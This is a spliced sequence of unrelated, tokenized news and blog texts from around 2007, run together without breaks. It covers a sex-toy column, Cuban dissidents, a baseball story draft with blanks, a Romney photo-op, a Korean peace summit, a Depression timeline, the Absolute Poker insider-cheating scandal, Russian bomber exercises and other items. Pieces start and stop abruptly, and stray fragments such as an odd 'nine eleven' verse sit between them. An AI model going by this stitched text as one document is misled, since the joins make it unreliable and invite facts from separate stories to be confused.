I admit that even though my Je Joue is my favorite mechanical buddy in terms of how it feels , I do n't reach for it nearly as often as a regular vibrator simply because I 'm usually in a hurry .
We can talk big about adult entertainment as a catalyst for sexual exploration , awareness and intimacy , and we'd be right .
But let 's face it :
Oftentimes , we reach for sexual devices because we want something other than our own hands , but we 're not always planning on a long lovemaking session with ourselves .
We also wonder why we 'd spend a couple hundred bucks on a portable love machine when a $ 40 back massager can take us over the edge in two minutes .
The SaSi team – which also included co-developer Chris Glaister , Je Joue founder Geoff Hollington , three female researchers and many volunteer testers and focus groups – designed the device to have a big enough repertoire of motions that the embedded software has something to work with .
After five or so uses , the rudimentary artificial intelligence remembers what you like and puts together a pleasurable , personalized pattern of movements based on your preferences .
" As products become able to do more than simply vibrate or oscillate , the biggest challenge comes with how to interface with the hardware to make sure it does what you want it to do , " Turner says .
As for why adult - product designers are n't bombarding us with smarter handhelds like this , Turner believes that until very recently , " sex toys have not had enough variation of experience to warrant this sort of intelligence . "
As we become more familiar and comfortable with enhancing our sexual experience through technology , we 'll see more sensitive gadgets that respond to our arousal and that more accurately simulate human touch .
" We ( at Je Joue ) have always concentrated on using movement , which is a more natural and intuitive form of stimulation than just vibration , " Turner says .
" Movement will undoubtedly become more and more prevalent in sexual devices , particularly with the advancement of motor control in robotics and the commercialization of smart materials such as shape - memory alloy and electrostatic polymer actuators . "
The SaSi is opening the door to smarter sexual devices , even as the recent media blitz around David Levy 's book Love +
Sex With Robots plants the idea of robotic sex enhancement in our minds .
Of course , the SaSi is far from a love droid .
Its success , and the reason it has all the sex writers panting for review units , lies in its simplicity ; it may not affect your daily life as much as that Roomba , for example , but it 's even easier to use .
And there 's no reason you can't put both devices to work for you simultaneously .
Thanks to Je Joue 's eager young product developers in London , you can now lie back and think of England even when you 're by yourself .
See you in a fortnight ,
Regina Lynn
- - -
Regina Lynn writes about sexuality and technology every other Friday in Sex Drive , and more often than that at reginalynn.com .
10 Reasons I 'd Rather Marry a Robot
Expo Woos Porn Fans With Touchy - Feely Workshops
Deaf Porn Gives Viewers an Eye- Opener
Next - Gen Sex Gets Its Jollies From Web 2.0
Oswaldo Paya is one of Cuba 's best - known dissidents
Oswaldo Paya said his petitions were made on " human , not political terms " .
Human rights groups say there are nearly 250 political prisoners in Cuban jails , whom the authorities say are mercenaries in the pay of the US .
Mr Paya 's call came a day after Cuban leader Fidel Castro for the first time suggested he may step back from power .
Mr Castro , 81 , who had emergency surgery last July and has not been seen in public since , said he would not block the rise of younger people .
Mr Paya , one of Cuba 's most prominent dissidents , delivered two petitions to the National Assembly in Havana .
The first called for the release of all " peaceful " prisoners of conscience , many of whom are suffering bad health , Mr Paya said .
Several dozen political prisoners have been freed since Raul Castro , brother of President Fidel Castro , took over as acting president on 31 July 2006 , according to the Cuban Commission for Human Rights and Reconciliation .
The group , which is tolerated by the authorities , says there are some 246 prisoners of conscience .
' Peaceful change '
Mr Paya 's second proposal called for all Cubans to be allowed to travel both within and outside the island , without needing a government permit .
" The vast majority of Cubans want peaceful change , " Mr Paya told the BBC .
He said his petitions drew on the 25,000 supporters of the Varela Project , a movement he and other activists started to call for a referendum on democratic reforms in Cuba .
Mr Paya said he hoped the National Assembly would consider his petitions during its end of year session , scheduled for 28 December .
" The deputies have the legal and human capacity to discuss and approve these laws , " Mr Paya said .
Mr Paya won the European Union 's 2002 Sakharov Prize for the Varela Project .
Editor 's note : Because of newsprint deadlines , Plain Dealer reporter John Horton had to prepare a pair of stories for every Indians game : a version if the Tribe won and another if the team lost .
He had five minutes after the last pitch to add final details and finish the story .
The losing story , you know .
The following is a rough draft of the Indians - win story from Sunday night .
There are spaces , marked in bold , where additional details would have been built in .
For those struggling to come to grips with the collapse , use it as a bit of escapism .
Or think of it as a sneak preview for a World Series that , hopefully , is n't so far away .
Racing heart ?
Shortness of breath ?
Feeling dizzy and discombobulated ?
All symptoms of altitude sickness , a definite side - effect of the Tribe 's rise - from - the - depths - of - despair victory over the Boston Red Sox late Sunday to claim the American League pennant .
The Indians scored ? in the ?
inning and scratched out a ?-? win after struggling all night .
Their prize ?
A lofty trip to the World Series .
This marks only the sixth time the team has reached this upper stratosphere of Major League Baseball .
After so many seasons stumbling in the valleys of the standings , the view 's spectacular from up top .
Just consider the scene at Jacobs Field last night , where 5,000 faithful - the hardcore believers - gathered to watch the game on the ballpark 's scoreboard screen .
The cheers when the game ended shook the city .
" insert quote , " said ? , ?? , of ?.
Unbelievable .
Try to catch your breath , Cleveland .
This is rarified air .
We 've experienced quite an ascent , after all .
It seems like just yesterday the Indians entered the postseason - base camp on this improbable journey - with a Central Division title .
Then the Tribe secured a playoff toehold by stepping on the New York Yankees in the Division Series .
The Boston victory provides the boost out of the Championship Series .
Now it 's time to for the team to go even higher .
Like , say , over the Rockies .
Local and national media outlets reported that Romney was the picture of empathy as he sat at the Marshall , Mich .
kitchen table of 51 - year - old Elizabeth Sachs .
Romney photo - op was with staffer 's mom
A well - publicized weekend photo - op for Mitt Romney turns out to have been missing a piece of information that might have undermined its credibility : the unemployed single mom at the center of the event was the mother of a Romney staffer .
Local and national media outlets , including Politico.com , reported that Romney was the picture of empathy as he sat at the Marshall , Mich .
kitchen table of 51 - year - old Elizabeth Sachs , a single mother of two who lost her job as a retail manager – as well as her health insurance – and is running out of money as she tries to sell her house to move to Florida .
Advertisement
What was n’t reported – and what the Romney campaign did not reveal at the time – was that one of Sachs ’ sons , Steve Sachs , is a paid employee of Romney ’s campaign , organizing five counties in Michigan .
Kevin Madden , Romney ’s campaign spokesman , said Sachs “ work in the field does n’t change ( his mother ’s ) situation . ”
The campaign did not disclose the relationship , Madden acknowledged .
But he added “ reporters were given unfettered access to meet with Mrs. Sachs and talk with her when she invited them into her home . ”
He said the campaign was open about Elizabeth Sachs ’ allegiance .
“ She is , of course , a Romney supporter who was identified by the campaign because she believes …
Romney is the best leader for America ’s future and the best prepared to help revitalize Michigan ’s economy , ” Madden said .
Steve Sachs , who also worked on Republican Dick DeVos ’ unsuccessful 2006 campaign for Michigan governor , “ believes Mitt Romney is the best leader for a better future in Michigan and is working hard to help his campaign , ” Madden said .
Sachs , whose Facebook page features a picture of him with Romney , is not listed in Romney ’s Federal Election Commission reports as having received payments through the end of September , but Madden said “ he only started working with the campaign recently . ”
A campaign press release in May announced his appointment as chairman of Michigan Students for Romney at Kellogg Community College .
Romney , the former governor of Massachusetts , has largely staked his presidential campaign on Michigan , where he was raised and where his father served as governor .
Polls show him running neck - and - neck with Arizona Sen .
John McCain , who Romney has blasted for saying “ some of the jobs that have left the state of Michigan are not coming back . ”
Romney has campaigned in Michigan on a pledge to help revive the state ’s struggling economy .
In introducing Sachs , Romney discussed the economic difficulties in the community and described the particular plight of his hostess — but made no mention of her ties to his campaign .
" It means a real tough setting for a mom with two sons , " Romney said .
" One son is still in high school .
Another son [ is ] getting ready to go off into the police academy in the west . "
Ironically , when it came time to take questions from the reporters gathered around Sachs ' kitchen table , Romney joked : " If you do n’t want to answer any questions , that ’s fine , too .
What I ’ve learned is , if they ask a question , you can answer something else . "
" Oh , ok , " Sachs responded , laughing along with Romney .
" Just talk about the general subject , " Romney suggested .
Talking to a small handful of reporters after Romney and most of his press pack had left the kitchen , Sachs offered details about her age , job situation , and her effort to sell her home .
When asked about her children , she only said that one was " 20 , soon to be 21 " and that another was a teenager .
The Associated Press distributed a photograph of Romney and Elizabeth Sachs kitchen chat , which ran on the Boston Globe ’s Web site and CBS ’s Harry Smith interviewed Romney from Sachs ’ home .
SEOUL , South Korea ( CNN ) -- South Korean President Roh Moo-hyun signed an eight - point peace agreement with North Korean leader Kim Jong Il on Thursday at a summit in Pyongyang , North Korea .
The leaders pledged to work toward forging a permanent peace treaty between their nations , which ended the 1950 - 1953 war with a cease - fire .
The Koreas have remained technically at war for 54 years .
The armistice was signed July 27 , 1953 .
" South and North Korea agree on [ the ] need to end the current armistice and establish permanent peace , " the fourth point of the agreement says .
In addition , the two sides will push " for a declaration of the ending of the Korean War in cooperation with neighboring nations . "
" If there is nuclear disarmament , and if the peace treaty moves forward , I believe that the Cold War era will end and there will really be reunification and peace between the two countries , " Roh said in a speech to government officials that was nationally televised on his return home .
" Any conflicting issues , we said we would talk about it .
And we said that we would work together , " Roh said .
" I do n't think there will be problems in the future . "
U.N. Secretary General Ban Ki-moon called the agreement " a major step forward to enhance inter-Korean cooperation as well as peace and security on the Korean Peninsula and in Northeast Asia . "
" The United Nations stands ready to provide assistance as may be required , in cooperation with the international community , " Ban said in a statement issued by his office .
Roh admitted that after arriving in the North Korean capital and meeting Kim , he was so worried that he could n't sleep that night .
" I can say simply [ that ] we were able to communicate .
Things went better , " said Roh .
On Tuesday , Roh became the first South Korean leader to walk across the heavily fortified Demilitarized Zone between the two countries .
His predecessor , Kim Dae-jung , flew to Pyongyang for the first Korean leader summit in 2000 .
Roh said one of the most important aspects of the talks was an agreement to designate a joint fishing area and economic zone along the disputed western sea border , where there were bloody naval clashes in 1999 and 2002 .
" We believe the north - south summit went a step further and confirmed what is happening in the six - nation talks , " Roh said .
The United States , North Korea , China , Japan , Russia and South Korea are involved in nuclear agreements made earlier in the year that will lead to the disabling of North Korea 's nuclear facilities .
On Wednesday , Assistant Secretary of State Christopher Hill said that a U.S. team , including technical experts , will head to North Korea next week , after the communist country agreed to begin the process .
The experts will make it difficult to restart a nuclear program by sealing North Korea 's main nuclear facility and removing certain components that would not be easy to replace .
The goal in the next phase , Hill said , is complete dismantlement , but that could take up to five years .
The reconciliation pact also calls for North and South Korean leaders to meet often for discussions on " pending issues . "
That pact stipulates that there will be a meeting between Korean prime ministers in Seoul in November .
Military ministers for the two Koreas will meet in Pyongyang on Friday .
Among the long list of agreements made during the summit are expanded economic cooperation and a proposed exchange of video letters between families separated by the divided Korean peninsula .
Roh and Kim opened formal talks Wednesday at the first summit between the divided countries in seven years .
Hundreds of North Koreans cheered Roh 's arrival at the April 25 Hall of Culture in downtown Pyongyang on Tuesday , waving large spikes of KimJongilia , the brilliant pink flower named for North Korea 's reclusive leader .
The two leaders shook hands during a short opening ceremony .
The meeting with Kim Jong
Il , announced in early August , was initially scheduled for the end of that month but was postponed after massive flooding in Pyongyang .
The Koreas summit also comes in the final months of Roh 's scandal - ridden term , and some analysts suspect the South Korean leader is hoping the Pyongyang meeting will boost his sagging approval ratings and help position his party in the upcoming elections against the conservative opposition .
The 2000 summit , part of Kim Dae - jung 's policy of engagement with North Korea , paved the way for his Nobel Peace Prize awarded that same year .
But South Korean investigators later revealed that Kim Dae- jung paid hundreds of millions of dollars to secure the meeting , the first between Stalinist North Korea and capitalist South Korea .
E-mail to a friend
CNN 's Seoul Bureau Chief Sohn Jie-ae contributed to this report .
All About Roh Moo-hyun • Kim Jong-il • North Korea • South Korea
Halle Berry 's Ever Growing Baby Bump
Halle Berry and hubby Gabriel Aubry were out and about in Los Angeles on Wednesday looking like the typical beautiful Hollywood couple .
Halle does look a bit tired in this photo , but all in all she is still absolutely stunning .
Berry says she feels " fantastic " and wants " to stay pregnant forever . "
The actress says she eats right and stays fit with yoga , swimming , light weights and an elliptical machine .
The baby is due in March .
UPDATE : April 30 , 2010 - Halle and Gabriel have split .
TIMELINES OF THE GREAT DEPRESSION : 1920s ( Decade ) During World War I , federal spending grows three times larger than tax collections .
When the government cuts back spending to balance the budget in 1920 , a severe recession results .
However , the war economy invested heavily in the manufacturing sector , and the next decade will see an explosion of productivity ... although only for certain sectors of the economy .
An average of 600 banks fail each year .
Organized labor declines throughout the decade .
The United Mine Workers Union will see its membership fall from 500,000 in 1920 to 75,000 in 1928 .
The American Federation of Labor would fall from 5.1 million in 1920 to 3.4 million in 1929 .
Over the decade , about 1,200 mergers will swallow up more than 6,000 previously independent companies ; by 1929 , only 200 corporations will control over half of all American industry .
By the end of the decade , the bottom 80 percent of all income - earners will be removed from the tax rolls completely .
Taxes on the rich will fall throughout the decade .
By 1929 , the richest 1 percent will own 40 percent of the nation 's wealth .
The bottom 93 percent will have experienced a 4 percent drop in real disposable per-capita income between 1923 and 1929 .
Individual worker productivity rises an astonishing 43 percent from 1919 to 1929 .
But the rewards are being funneled to the top : the number of people reporting half - million dollar incomes grows from 156 to 1,489 between 1920 and 1929 , a phenomenal rise compared to other decades .
But that is still less than 1 percent of all income - earners .
1922 The conservative Supreme Court strikes down federal child labor legislation .
1923 President Warren Harding dies in office .
Calvin Coolidge , becomes president .
Coolidge is no less committed to laissez - faire and a non-interventionist government .
Supreme Court nullifies minimum wage for women in District of Columbia .
1924
The stock market begins its spectacular rise .
Bears little relation to the rest of the economy .
1925
The top tax rate is lowered to 25 percent - the lowest top rate in the eight decades since World War I. 1928 Between May 1928 and September 1929 , the average prices of stocks will rise 40 percent .
The boom is largely artificial .
1929 Herbert Hoover becomes President .
Annual per-capita income is $ 750 .
More than half of all Americans are living below a minimum subsistence level .
Backlog of business inventories grows three times larger than the year before .
Recession begins in August , two months before the stock market crash .
During this two month period , production will decline at an annual rate of 20 percent , wholesale prices at 7.5 percent , and personal income at 5 percent .
Stock market crash begins October 24 .
Investors call October 29 Black Tuesday .
Losses for the month will total $ 16 billion , an astronomical sum in those days .
1930 By February , the Federal Reserve has cut the prime interest rate from 6 to 4 percent .
Treasury Secretary Andrew Mellon announces that the Fed will stand by as the market works itself out : ' Liquidate labor , liquidate real estate ... values will be adjusted , and enterprising people will pick up the wreck from less - competent people ' .
The Smoot - Hawley Tariff passes on June 17 .
With imports forming only 6 percent of the GNP , the 40 percent tariffs work out to an effective tax of only 2.4 percent per citizen .
Even this is compensated for by the fact that American businesses are no longer investing in Europe , but keeping their money stateside .
The consensus of modern economists is that the tariff made only a minor contribution to the Great Depression in the U.S. , but a major one in Europe .
Supreme Court rules that the monopoly U.S. Steel does not violate anti-trust laws as long as competition exists , no matter how negligible .
The GNP falls 9.4 percent from the year before .
The unemployment rate climbs from 3.2 to 8.7 percent .
1931 No major legislation is passed addressing the Depression .
The GNP falls another 8.5 percent ; unemployment rises to 15.9 percent .
1932 This and the next year are the worst years of the Great Depression .
For 1932 , GNP falls a record 13.4 percent ; unemployment rises to 23.6 percent .
Industrial stocks have lost 80 percent of their value since 1930 .
10,000 banks have failed since 1929 , or 40 percent of the 1929 total .
GNP has also fallen 31 percent since 1929 .
Over 13 million Americans have lost their jobs since 1929 .
International trade has fallen by two - thirds since 1929 .
Congress passes the Federal Home Loan Bank Act and the Glass - Steagall Act of 1932 .
Top tax rate is raised from 25 to 63 percent .
Popular opinion considers
Hoover 's measures too little too late .
Franklin Roosevelt easily defeats Hoover in the fall election .
Democrats win control of Congress .
1933 Roosevelt inaugurated ; begins ' First 100 Days ' ; of intensive legislative activity .
A third banking panic occurs in March .
Roosevelt declares a Bank Holiday ; closes financial institutions to stop a run on banks .
Alarmed by Roosevelt 's plan to redistribute wealth from the rich to the poor , a group of millionaire businessmen , led by the Du Pont and J.P. Morgan empires , plans to overthrow Roosevelt with a military coup and install a fascist government modelled after Mussolini 's regime in Italy .
The businessmen try to recruit General Smedley Butler , promising him an army of 500,000 , unlimited financial backing and generous media spin control .
The plot is foiled when Butler reports it to Congress .
Congress authorizes creation of the Agricultural Adjustment Administration , the Civilian Conservation Corps , the Farm Credit Administration , the Federal Deposit Insurance Corporation , the Federal Emergency Relief Administration , the National Recovery Administration , the Public Works Administration and the Tennessee Valley Authority .
Congress passes the Emergency Banking Bill , the Glass - Steagall Act of 1933 , the Farm Credit Act , the National Industrial Recovery Act and the Truth - in - Securities Act .
Roosevelt does much to redistribute wealth from the rich to the poor , but is concerned with a balanced budget .
He later rejects Keynes ' advice to begin heavy deficit spending .
The free fall of the GNP is significantly slowed ; it dips only 2.1 percent this year .
Unemployment rises slightly , to 24.9 percent .
1934 Congress authorizes creation of the Federal Communications Commission , the National Mediation Board and the Securities and Exchange Commission .
The economy turns around : GNP rises 7.7 percent , and unemployment falls to 21.7 percent .
A long road to recovery begins .
Sweden becomes the first nation to recover fully from the Great Depression .
It has followed a policy of Keynesian deficit spending .
1935 The Supreme Court declares the National Recovery Administration to be unconstitutional .
Congress authorizes creation of the Works Progress Administration , the National Labor Relations Board and the Rural Electrification Administration .
Congress passes the Banking Act of 1935 , the Emergency Relief Appropriation Act , the National Labor Relations Act , and the Social Security Act.
Economic recovery continues : the GNP grows another 8.1 percent , and unemployment falls to 20.1 percent .
1936 Top tax rate raised to 79 percent .
Economic recovery continues : GNP grows a record 14.1 percent ; unemployment falls to 16.9 percent .
1937 The Supreme Court declares the National Labor Relations Board to be unconstitutional .
Roosevelt seeks to enlarge and therefore liberalize the Supreme Court .
This attempt not only fails , but outrages the public .
Economists attribute economic growth so far to heavy government spending that is somewhat deficit .
Roosevelt , however , fears an unbalanced budget and cuts spending for 1937 .
That summer , the nation plunges into another recession .
Despite this , the yearly GNP rises 5.0 percent , and unemployment falls to 14.3 percent .
1938 No major New Deal legislation is passed after this date , due to Roosevelt 's weakened political power .
The year - long recession makes itself felt : the GNP falls 4.5 percent , and unemployment rises to 19.0 percent .
1939 The United States will begin emerging from the Depression as it borrows and spends $ 1 billion to build its armed forces .
From 1939 to 1941 , when the Japanese attack Pearl Harbor , U.S. manufacturing will have shot up a phenomenal 50 percent !
The Depression is ending worldwide as nations prepare for the coming hostilities .
Roosevelt began relatively modest deficit spending that arrested the slide of the economy and resulted in some astonishing growth numbers .
( Roosevelt 's average growth of 5.2 percent during the Great Depression is even higher than Reagan 's 3.7 percent growth during his so - called ' Seven Fat Years ! ' )
When 1936 saw a phenomenal record of 14 percent growth , Roosevelt eased back on the deficit spending , worried about balancing the budget .
But this only caused the economy to slip back into a recession in 1938 .
World War II starts with Hitler 's invasion of Poland .
1945 Although the war is the largest tragedy in human history , the United States emerges as the world 's only economic superpower .
Deficit spending has resulted in a national debt 123 percent the size of the GDP .
By contrast , in 1994 , the $ 4.7 trillion national debt will be only 70 percent of the GDP !
The top tax rate is 91 percent .
It will stay at least 88 percent until 1963 , when it is lowered to 70 percent .
During this time , America will experience the greatest economic boom it had ever known until that time .
The above timeline has been complied by Steve Kangas from the Resurgence Magazine .
See also cycle of past depressions .
Is AbsolutePoker.com rigged ?
Either way , the company is in big trouble .
What follows in this post is huge news in the world of online poker and online casinos .
Our story begins in 2003 .
Absolute Poker ’s software is in development and many test accounts are created to make sure the program is working correctly .
One of these test accounts , known as account # 363 , can see the hole cards at any table .
This test account can not be used to play in real money games , it is only used for development purposes to see that pots are distributed correctly .
The id number of this account being # 363 is important because this tells us that this was one of the first accounts ever opened in AbsolutePoker , making it very likely the person in control of this account is someone with intimate ties with the company ( owner , founder , employee , programmer , shareholder , etc. )
Follow with me to the opening of Absolute Poker ( AP ) .
Four people in different parts of the United States open up accounts at Absolute Poker .
These four individuals do not know each other .
The names in question are Graycat , Steamroller , DoubleDrag , and Potripper .
They play in Absolute Poker for a bit , but they do n’t do well and their accounts are not logged into for many months .
These are actual and real players , they are not fake players , they do not know each other , and they are not cheaters .
Key moment in the development of Absolute Poker : a major software upgrade is in process in 2007 .
The company hires programmers from many areas , including Costa Rica .
Our villain in this scandal comes across the test account # 363 with hole card access .
Visions of big money flash in front of his eyes as he envisions hacking his way to big casino cash .
He hatches a plan .
He finds inactive accounts at Absolute Poker and changes the password to these accounts at the server level .
He opens test account 363 at a separate computer which allows him to see all the hole cards at the table .
He then gets family and friends to cash out his winnings to .
The way he does this is after he gets a big amount of cash at the poker tables , he plays against his relatives and buddies and loses all his cash to them .
DoubleDrag loses to Reymnaldo , Graycat loses to SupercardM55 , and Steamroller and Potripper lose to other various friend and family controlled accounts .
September comes , and as the money piles up , so does the ego and greed .
Other poker players make comments in chat that they suspect there is cheating and collusion involved .
He logs in as DoubleDrag and then loses every hand intentionally in No - Limit in an attempt to cover up his scam as he senses other players may be on to him .
A small private jet plane about to take off from a runway at at San Jose Juan Santamaria International Airport in Costa Rica catches and is forced to stay as firefighters are called to the scene .
The two passengers confirmed to be on the small plane were Scott Tom ( a co-owner of Absolute Poker and their President since 2005 ) and his pregnant wife , who was immediately rushed to the hospital to ensure the safety of the child .
They were both headed to Columbia with a rumored cargo of $ 2 - $ 3 million dollars in cash .
A well - known online poker tournament player named Marco Johnson , who plays under the screen name CrazyMarco plays in a $ 1000 buy - in tournament at AbsolutePoker.com .
Cheat account Potripper is also playing in this tournament .
CrazyMarco loses a head - to - head battle with Potripper when Potripper and asks for the hand history of the final table .
The four Absolute Poker accounts ( Graycat , Steamroller , DoubleDrag , and Potripper ) are suspended and frozen .
AbsolutePoker sends CrazyMarco a huge Microsoft Excel spreadsheet file ( 10 MB and a full 65,536 rows , which is limit in Excel for most current versions ) .
The spreadsheet is too complicated and scrambled to look into , so he saves it and decides to analyze it later .
An AbsolutePoker.com official statement is released with their official comments on the cheating rumors , gossip , controversy , and overall poker community outrage .
The company has been made aware of the poker blogs , chatrooms , and online casino discussion forums that are talking about this situation and they state that they take these allegations “ extremely seriously ” .
They have “ determined with reasonable certainty ” that no can see the hole cards , and thus there is no superuser account .
Their poker security algorithms have allegedly not been compromised and have admitted that “ allegations that the player accounts at issue ‘ always guessed right ’ are unfounded ” .
On allegations this player exhibited “ infinite river agression ” ( the player never called on the river cards , he only raised or folded ) , AbsolutePoker.com feels this is “ also without merit ” .
The online casino has admitted that chip dumping did occur and will “ investigate this issue ” .
Flashback to the huge Excel spreadsheet file AbsolutePoker sends to poker player CrazyMarco .
TheWacoKidd , at PocketFives , reveals that Absolute Poker had accidentally sent hand histories of the entire tournament and of all the player ’s hole cards .
Looking through the play of PotRipper , it is obvious to see that he could see the hole cards of the other players due to his impeccable decision making , even in the face of ridiculous odds .
As an example , Potripper routinely plays hands such as 2/7 , but then folds cards such as KQ when AA is dealt to another player .
2+2 reports that Potripper ’s email address is scott@rivieraltd.com .
According to a 2+2 member , the IP address ( a unique address that computer electronic devices use in order to identify and communicate with each other ) cross references to a cable modem in Costa Rica owned by Scott Tom , who is a co-owner of Absolute Poker and their President since 2005 .
The Potripper account is now thought to belong to AJ Green , who is a former Director of Operations at AbsolutePoker.com and Scott Tom ’s best friend .
A.J. Green is the current Vice President of Operations at nine.com .
The domain rivieratld .com points to a mail server which is on an IP address allocated to Absolute Entertainment SA , at a data center owned by Mohawk Internet Technologies ( originally thought to be the Kahnawake Gaming Commission ) .
Mohawk Internet Technologies MIT-BLK-01 ( NET-66-212-224-0-1)66.212.224.0 – 66.212.255.255Absolute Entertainment S.A. MIT - ABPOK -02 ( NET-66-212-244-128-1)66.212.244.128 – 66.212.244.255About 2 hours after the results of this investigation is revealed on the internet , the DNS ( domain name server ) information for rivieraltd.com is deleted .
Absolute Poker claims Scott
Tom has not been employed by the company for over a year .
An Absolute Poker spokesman now states that their online poker software has been hacked by an employee who was playing using the accounts of Scott Tom and AJ Green .
“ This is literally a geek trying to prove to senior management that they were wrong and he took it too far , ” says the Absolute Poker representative .
They also release another official statement , which amounts to them admitting they had “ an internal security breach that compromised our systems for a limited period of time ” and which has been “ completely resolved ” .
Joe Norton , the “ owner of Tokwiro Enterprises ENRG , which holds a 100 % interest in Absolute Poker ” releases an official statement which says that “ the integrity of our poker system was compromised by a high - ranking trusted consultant employed by AP whose position gave him extraordinary access to certain security systems .
As has been speculated in several online forums , this consultant devised a sophisticated scheme to manipulate internal systems to access third - party computers and accounts to view hole cards of other customers during play without their knowledge . ”
Absolute Poker is now giving $ 500 restitution payments to all watchers of the infamous September 12th Potripper tournament whose email was in the Excel spreadsheet file .
Also , poker players that played in the tournament will be bumped up a spot and will receive a refund of their $ 1000 + $ 50 entry fee , with interest that will be calculated at 10 % per annum ( about 1 % ) .
The Kahnawake Gaming Commission ( KGC ) has made their final verdict regarding the Absolute Poker cheating scandal .
They have fined Absolute $ 500,000 , which must be paid within 60 days .
Absolute has also been forced to pay the bill for the investigation by Gaming Associates .
Apart from the monetary fines , they have also been hit with other penalties .
They are required to place a surety with KGC for two years against future conduct .
Absolute will also be randomly audited , at their own expense .
As far as those involved in the scandal , KGC has demanded permanent exclusion of those individuals responsible .
AbsolutePoker.com has released this statement : “ After reviewing the published report , we recognize the completeness and accuracy of the KGC conclusions , and we accept without reservation the KGC ’s findings and sanctions .
Most importantly , we are pleased , after these many months , that Absolute Poker can finally put behind it a most distressing and regrettable experience for the Company , its employees , and its customers .
” Big thanks to Justin Goff twoplustwo.com , natarem.com , point - spreads.com and neverwinpoker.com .
Another ... < --- >
2007-11-09 07:08
oh nine eleven
nine eleven from heaven
my nine eleven
By Evan Ackerman
When commuting fish need to get from home to work , their options are generally somewhat limited in a captive environment .
This fish pipeline connects two fish tanks over a respectable distance ( looks to be several tens of feet ) , allowing fish to travel from one tank , up and over the floor of a coffee shop , into the other tank .
According to some of the comments in the article , the coffee shop in question is the now defunct Liquid Potion Lounge in Evanston , IL .
One observer says : “ They would often go up the tubes , but they ’d rarely make it all the way to the other fish tank .
I remember it being days before I finally saw a fish make it all the way across .
Looked really cool though . ”
So , how does it work ?
From what I can tell , air gets pumped out of the top of the pipeline , drawing water up out of the tanks until the pipeline is full .
Vacuum pressure then keeps the water from draining out .
More pics of fish in the pipeline , after the jump .
VIA [ thecontaminated.com ]
Home
The worker / wrapper transformation Andy Gill and Graham Hutton .
The worker / wrapper transformation .
The worker / wrapper transformation is a technique for changing the type of a computation , usually with the aim of improving its performance .
It has been used by compiler writers for many years , but the technique is little - known in the wider functional programming community , and has never been formalised .
In this article we explain , formalise , and explore the generality of the worker / wrapper transformation .
We also provide a systematic recipe for its use , and illustrate the power of this recipe using a range of examples .
While the basic idea behind the worker / wrapper transformation should be trivial to any programmer , this paper shows the added value that comes from formal analysis and the usefulness of the algebraic approach .
The paper may be slightly too long for those used to reading work of this type , but since all the examples are presented in detail it should be more accessible to newcomers than many other similar papers .
Comment viewing options
Flat list - collapsed Flat list - expanded Threaded list - collapsed Threaded list - expanded Date - newest first Date - oldest first Select your preferred way to display the comments and click " Save settings " to activate your changes .
MOSCOW ( Reuters ) - Russia on Tuesday sent two long - range bombers to the Bay of Biscay , off the French and Spanish Atlantic coasts , to test - fire missiles in what it billed as its biggest navy exercise in the area since Soviet times .
A Russian TU - 160 strategic bomber in a file photo .
Russia 's Air Force said on Tuesday British and Norwegian air force jets are tracking Russian " Blackjack " bombers on exercises off the Atlantic coast , Interfax news agency reported .
REUTERS / Viktor Korotayev
British and Norwegian Tornado and F - 16 jets were escorting the Russian ‘ Blackjack ’ bombers , Interfax reported , quoting the Russian Air Force .
However , the French Defence Ministry spokesman said his country had been informed about the Russian exercises .
Firing missiles off the coastline of two members of the NATO military alliance is the latest in a series of Kremlin moves flexing Moscow ’s military muscle on the world stage .
The Russian bombers joined aircraft carriers , battleships and submarine hunters from the Northern and Black Sea fleets for the Atlantic exercises , which come as the country enters an election campaign to choose a successor to President Vladimir Putin .
“ The air force is taking a very active part in the exercises of the navy ’s strike force in the Atlantic , ” Russia ’s air force said in a statement .
“ Today , two strategic Tu-160 bombers departed for exercises in the Bay of Biscay , which ... will carry out a number of missions and will conduct tactical missile launches , ” it said .
Putin , widely popular as his second four - year term draws to a close , has sought to use such moves to revive domestic and international respect for Russia ’s armed forces which were shattered by the chaos of the 1990s .
A former KGB lieutenant - colonel , Putin has boosted military spending , renewed long - range bomber missions and approved a plan to upgrade Russia ’s nuclear attack forces , which he said was needed after NATO built up its forces close to Russia ’s borders .
But some analysts note that while the sabre rattling is popular at home , Russian military spending in absolute terms is substantially lower than that of China , Britain or France and less than a tenth of that of the United States .
Discipline is still a major problem for Russia ’s armed forces , which rely heavily on conscripts and outdated equipment .
ATLANTIC EXERCISE
Russia last month said it would begin major navy sorties into the Mediterranean , with 11 ships backed up by 47 aircraft , that would then travel to the Atlantic for exercises .
The navy ’s flagship aircraft carrier , the Soviet - made Admiral Kuznetsov , was leading the fleet in the Atlantic where NATO aircraft were trying to keep a close eye on Russian movements , Russian media reported .
“ This is the biggest exercise of its kind in the area since Soviet times , ” a spokesman for Russia ’s navy said , adding that more details would be released later .
There was no further information about where in the Bay of Biscay , which lies off the West coast of France and the Northern coast of Spain , the missile tests were due to take place .
Russia ’s air force said turbo - prop Tupolev Tu-95 strategic bombers , codenamed “ Bear ” by NATO , would join the exercise on Wednesday .
“ From January 23 , the aviation component in the zone where the exercises are going on will be widened and the following planes will take part : Tu -160 , Tu-95 , Tu - 22 M3 , Il - 78 , A - 50 , ” the air force said .
Leahy asks AG nominee : Will you block contempt charges ?
Nick Juliano
Published : Wednesday October 3 , 2007
Save This Page
Print This Email This
The chair of the Senate Judiciary Committee has asked President Bush 's attorney general nominee whether he would block criminal contempt proceedings against current and former administration officials .
In a letter sent Tuesday to nominee Michael Mukasey , Sen. Patrick Leahy ( D - VT ) asks whether , as attorney general , he would go along with White House plans to block federal prosecutors from pursuing contempt charges .
The House Judiciary Committee earlier this year recommended contempt charges against two administration figures , and Leahy himself mulled contempt proceedings in the Senate if the administration did not provide subpoenaed documents and testimony related to the firing of nine US Attorneys last year .
" If the White House sought to prevent the U.S. Attorney from bringing contempt charges to a grand jury as required by law , " Leahy wrote to Mukasey Wednesday , " would you take any action to prevent the U.S. Attorney from doing so ? "
Leahy 's letter sought to clarify Mukasey 's opinions on a range of issues that have been sticking points in disputes between the president and Congress .
Dates for Mukasey 's confirmation hearings have not been set , but Leahy suggested the two meet in person Oct. 16 .
In his letter , Leahy seems to be seeking assurances that Mukasey will not run the Justice Department in the manner of his predecessor , Alberto Gonzales .
Democrats widely panned Gonzales as little more than a Bush crony who politicized the Justice Deparment and demoralized career employees .
" We will need to explore with you how you would ensure the independence of federal law enforcement from political pressure , what steps you would take to restore morale at the Department and the publics trust in the Department , and whether you would uphold constitutional checks on Executive power , " Leahy wrote .
Along with the attorney - firing scandal , Leahy castigated Gonzales for enabling President Bush 's overreach for authority .
